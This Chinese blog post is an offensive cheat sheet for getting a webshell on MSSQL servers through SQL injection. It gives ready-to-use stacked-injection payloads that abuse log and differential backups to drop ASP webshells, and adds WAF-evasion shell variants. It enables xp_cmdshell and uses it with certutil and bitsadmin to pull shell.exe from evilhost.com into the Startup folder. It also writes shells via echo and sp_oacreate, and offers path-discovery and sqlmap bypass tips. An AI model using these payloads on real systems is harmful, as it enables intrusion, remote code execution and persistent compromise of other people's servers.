mssql 日志备份getshell

已于 2023-06-15 12:06:14 修改
阅读量300 收藏
点赞数 1
文章标签: 网络安全
于 2023-04-24 19:18:43 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_35013491/article/details/130349707
版权

一:优先log备份

aaaa';alter database EOA_YWYM set RECOVERY FULL--
aaa';create table ssc (a image)--
aaa';backup log EOA_YWYM to disk = 'c:\ssc' with init--
aaa';insert into ssc (a) values ('888AAAAAAAAAA<%as99AA=REquEst("x"):EvaL(as99AA)%>888888888888888888')--
aaa';backup log EOA_YWYM to disk = 'E:\\web\sss9122.asp'--


EOA_YWYM 为数据库名
E:\\web\sss9122.asp 为网站物理路径

第一个disk = 有权限写入的目录。

第三个disk = 写入webshell的网站物理地址。(根目录写不进去可以考虑网站上传目录)

如果有waf的话可以考虑换个一句话写入。

<%%25Execute(request("go"))%%>
<%Execute(request("go"))%>
%><%execute request("go")%><%
<script language=VBScript runat=server>execute request("sb")</Script>
<%25Execute(request("l"))%> 
0x3C25657865637574652872657175657374282261222929253E

二:差异备份:(数据库很小时使用,大了会不成功)

;backup database 库名 to disk = ‘c:\bak.bak’ ;–-    //先手动备份一次
;create table 数据库名..表名(a image)–-     //建立表,加字段
;insert into 数据库名..表名(a) values (0x一句话木马)–-     //插入一句话木马到表中,注意16进制
;backup database 库名 to disk = ‘c:\shell.asp’ with differential , format ;-- //进行差异备份

开启 xp_cmdshell 

EXEC sp_configure 'show advanced options', 1;RECONFIGURE;EXEC sp_configure 'xp_cmdshell', 1;RECONFIGURE;

执行命令

EXEC master..xp_cmdshell 'whoami'

certutil 下载文件

EXEC master.dbo.xp_cmdshell 'cd C:\Users\Public & certutil -urlcache -split -f http://evilhost.com/download/shell.exe';

 bitsadmin 下载文件并写入系统启动项

EXEC master.dbo.xp_cmdshell 'bitsadmin /transfer n http://evilhost.com/image/shell.exe C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\shell.exe'

CMD写一句话木马:

翻写遇到 < 及 >

均需要前面加入^     

< = ^<
> = ^>

echo 一句话asp:

echo ^<%eval request("c")%^> >>  D::\web\shell.asp

echo 一句话aspx:

echo ^ <^%@ Page Language="Jscript" validateRequest="false" %^> ^ <^%Response.Write(eval(Request.Item["w"],"unsafe"));%^> ^ > D:\web\ok.asp

利用sp_oacreate 写shell

declare @f int,@g int exec sp_oacreate "Scripting.FileSystemObject",@f output EXEC SP_OAMETHOD @f,"CreateTextFile",@f OUTPUT,"d:\\web_waiwang\\aacc.aspx",1 EXEC sp_oamethod  @f,"WriteLine",null,"GIF89a<%@ Page Language='Jscript'%><%eval(Request.Item['ice'],'unsafe');%>"--

1.  能执行命令的话   where /R  D:\wwwroot\   /T  t_2810039303.jpg 

2.  能读文件的话 读 iis配置
IIS5.0默认配置文件路径
C:\WINNT\system32\inetsrv\MetaBase.bin
IIS6.0默认配置文件路径
C:\WINDOWS\system32\inetsrv\MetaBase.xml
IIS7.x默认配置文件路径
C:\WINDOWS\system32\inetstr\config\applicationHost.config

3.  都不能的时候 看看找类似是网站目录的路径 访问ashx文件

4. 就注入点单引号 看看报错暴路径不。

5. iis7.5默认暴路径。

6. 看访问ip80 端口 是默认iis页面不 ,写shell到默认网站路径

7. 看看有没有网站备份 把路径做个字典都访问一下,还有配置文件中也可能会有网站物理路径。

1.  手工不行的话,用sqlmap --sql-shell  执行sql语句。还是不行的话可以考虑sqlmap 加 --hex

具体sqlmap语句的或者需要突破waf  sqlmap 加 --proxy=http://127.0.0.1:8080 走burp再突破。

低调求绕过,没事写博客
关注
  • 1
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
mssql基础(二)——get shell的的方式
7Riven's blog
11-06 556
测试环境windows-server-2003+sql sever2005 1.利用存储过程拿shell 允许修改高级参数:;exec sp_configure'show advanced options',1; 根据提示使用reconfigure语句进行安装 打开xp_cmdshell扩展:exec sp_configure'xp_cmdshell',1; 再次执行reco...
利用MSSQL getshell
热门推荐
浅笑996的博客
11-17 1万+
此次复现使用的sql server 2000 和sql server 2008两个环境进行的 是在已知数据库密码的基础上进行的 0x01 MSSQL连接 连接MSSQL 2000 新建连接: 填写目的IP、目的端口、用户名、密码: 一直下一步,完成后,数据库导航窗口会出现一个连接,双击连接: 若是第一次连接,双击会提示下载驱动文件,若不成功,需多次反复尝试 新建SQL编辑器即可执行SQL语...
SQL log备份WEBSHELL总结
HackCode的专栏
07-26 497
 当SQL注入是得到DB权限时候,接下来可以做的工作很多,象找管理员密码,后台管理这些都可以帮助你拿到WEBSHELL,但是这篇文章讲的是log备份,LOG备份出来的小马的体积小,而且备份的成功的可性很大,所以是我作为对DB权限的第一种试探方法.但是在LOG备份中,我们经常会遇到一些很让我们头痛的问题,那就是闭合的问题,我在这里做个总结,也好让我们对不能闭合的方法有一个全面的了解.1.先介绍下LO
shell_数据库备份webshell
weixin_39648469的博客
01-12 252
测试之前数据库备份webshell算是比较老的web后台才有的一个漏洞,之前也做过类似的,这次偶然有机会帮朋友看来一个类似的站,所以在此分享一下。仅供学习,严守底线。测试开始$ http://xxxxxxx.com/Manage/login.asp登陆界面:帐号密码是弱密码。然后进后台简单的看了看,发现是kindeditor的编辑器,13年的应该是4.1.10,所以之前爆出的漏洞基本不...
Mysql数据库getshell方法
最新发布
weixin_68408599的博客
04-02 1384
今天摸鱼时候,突然有人问我不同的数据库getshell的方式,一时间我想到了mysql还有redis未授权访问到getshell的方式,但是仅仅第一时间只想到了这两种,我有查了查资料,找到了上面两种数据库getshell的补充,以及其他数据库getshell的方式。因此更新一个专栏,各个数据库getshell的方式。
一次差异备份shell过程
weixin_33724059的博客
01-24 548
0x00 前言 扫描器扫到了某个网站存在目录浏览,于是便有了本文。。。 知识点科普: 1. 目录浏览 目录浏览在我个人看来是危害较大的一个漏洞,该漏洞是指“在没有默认文档的目录下,列出该目录下所有文件名及文件信息”,如果站点存在这种错误配置,***者如果知道其中目录名,则可以查看到这些目录下的文件。 2.差异备份条件 站点绝对路径 具有路径写入权限 具备当前数据库权限 0x01 ...
linux实现mysql数据库每天自动备份定时备份
09-09
3. **编写备份脚本**:使用`mysqldump`工具生成SQL格式的备份,可以创建一个名为`bkDatabaseName.sh`的shell脚本,内容如下(替换相应参数): ``` #!/bin/bash mysqldump -uusername -ppassword DatabaseName > ...
MySQL定时备份方案(利用Linux crontab)
12-14
总之,利用Linux的crontab和shell脚本,我们可以构建一个可靠且易于维护的MySQL数据库备份方案,确保数据的安全性和可恢复性。在实际应用中,根据具体的业务需求和服务器环境,可能需要对脚本和crontab任务进行相应...
shell一键安装MySQL5.7.38
08-02
在IT行业中,数据库管理系统是至关重要的,而MySQL作为开源、免费的关系型...在实际应用中,还需要关注日志文件、安全设置、备份策略等其他细节,确保数据库系统的稳定运行。希望这个指南能帮助你快速上手MySQL管理。
PHP mysql备份以及还原源码
11-11
在实际应用中,应确保所有敏感信息的安全,并对备份和还原过程进行适当的错误处理和日志记录。 综上所述,PHP结合MySQL提供的备份和还原功能为网站管理员提供了方便的数据管理手段。通过编写自定义的PHP脚本,可以...
mssql数据库提权之——xp_cmdshell执行系统命令
01-19
条件 所谓利用数据进行提权,利用的其实是数据库的运行权限,所以只要我们满足以下条件即可进行提权: 1、 必须获得sa的账号密码或者与sa相同权限的账号密码,且mssql没有被降权。 2、 必须可以以某种方式执行sql语句,例如:webshell或者是1433端口的连接。 提权基本思路过程与原理 1.MSSQL在Windows server类的操作系统上,默认具有system权限。System权限在Windows server2003中权限仅比管理员小;而在2003以上的版本,则为最高权限。 2.获取webshell之后可尝试在服务器各个站点的目录寻找sa的密码(某些站点直接在web应用程序中使
所有差异备份工具包(getwebshell2,sqlcomm,小志 SQL沙盘提权备份工具.exe,GetWebshellah56bug大众版,MSSQL_UP,DB_OWNER权限备份hta到启动项提权的小工具)
05-02
所有差异备份工具包(getwebshell2,sqlcomm,小志 SQL沙盘提权备份工具.exe,GetWebshellah56bug大众版,MSSQL_UP,DB_OWNER权限备份hta到启动项提权的小工具等等!)
mysql_shell
12-29
MySQL Shell还提供了调试和性能分析工具,如查询计划分析、慢查询日志查看等功能,帮助用户优化数据库性能。同时,它具有丰富的错误处理和日志记录机制,便于诊断问题。 总之,MySQL Shell作为MySQL的前端工具,以...
如何在找到mssql注入获取shell
trouble2662714198的博客
06-20 2120
我在渗透过程中经常会遇到这种情况,我找到了一处注入,是基于时间的盲注,mssql有着强大功能其中之一就是执行任意系统命令。 但是,问题在于时间盲注,返回值很慢,简直到了让人抓狂的地步,因此,我总结一下我常用的方法,来获得一个优质的shell 1、开启3389,添加administrators组用户。 但是会经常遇到一些问题,比如3389打不开,可能是有防火墙,可以重置防火钱,可能是有其他防护...
mssql差异备份shell
一个码农的笔记
03-08 5316
(1)首先: declare @a sysname,@s varchar(4000) select @a=db_name(),@s=0x4e6577706f7274 backup database @a to disk=@s; 注意:0x4e6577706f7274 这个字符串是数据库名字的十六进制数字,这个这个字符串的转换用hackbar这个小工具进行转换 这里的数据库名字是:Newpor
MSSQL差异备份取系统权限
Quantum Intelligence
08-26 1527
 MSSQL差异备份取系统权限TEAM里的内部资料放久了,现在不放出来,迟早会有人发掘出来的!既然如此就拿出来大家分享吧!MSSQL差异备份获取webshell 几乎人人皆知,那么我们可以利用差异备份出来的文件 当作恶意代码让系统执行了之后自动提升权限 或者添加管理员吗? 答案当然可以了,kj021320测试了N次之后跟你说!那么我们得考虑文件摆放的位置~什么地方系统会运行呢?这个其实算是
mssqlshell
m0_55772907的博客
11-20 774
getshell
mysql 备份getshell_数据库备份getshell
weixin_34712106的博客
02-03 668
0x00 前言很久之前通过数据库备份拿到的一个webshell,本来准备等他们修复了之后再写的,但是提交了漏洞和修复方案他们接收之后很长时间没有修复,忽视了漏洞。所以今天写出来了。0x01 多次尝试首先这个站是偶然google hacking时找到的后台弱密码,进入后台之后发现是IIS6.0的服务器:这个后台可以对前端的文章、新闻等进行修改,发现可以上传图片到文章中,是一个上传点。先编辑一个一句话...
利用SQL注入漏洞登录后台
weixin_33787529的博客
04-17 4427
2019独角兽企业重金招聘Python工程师标准>>> ...
mysql增量备份shell脚本
11-29
以下是一个MySQL增量备份Shell脚本示例,可以根据实际情况进行修改: ```shell #!/bin/bash # MySQL增量备份脚本 # 备份目录 backup_dir=/opt/mysqlbackup/inc # MySQL用户名 mysql_user=root # MySQL密码 mysql_password=123456 # MySQL数据目录 mysql_data_dir=/var/lib/mysql # MySQL日志文件 mysql_binlog_file=/var/lib/mysql/mysql-bin.index # 备份文件名 backup_file=$backup_dir/$(date +%Y-%m-%d).sql # 判断备份目录是否存在,不存在则创建 if [ ! -d $backup_dir ]; then mkdir -p $backup_dir fi # 获取当前MySQL二进制日志文件名 current_binlog_file=$(tail -n 1 $mysql_binlog_file) # 备份当前二进制日志文件之前的所有数据 mysqlbinlog --no-defaults --raw --read-from-remote-server --host=localhost --user=$mysql_user --password=$mysql_password --stop-never --result-file=$backup_file $mysql_data_dir/$current_binlog_file # 将备份文件导入到MySQL中 mysql --user=$mysql_user --password=$mysql_password < $backup_file # 删除备份文件 rm -f $backup_file ```

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值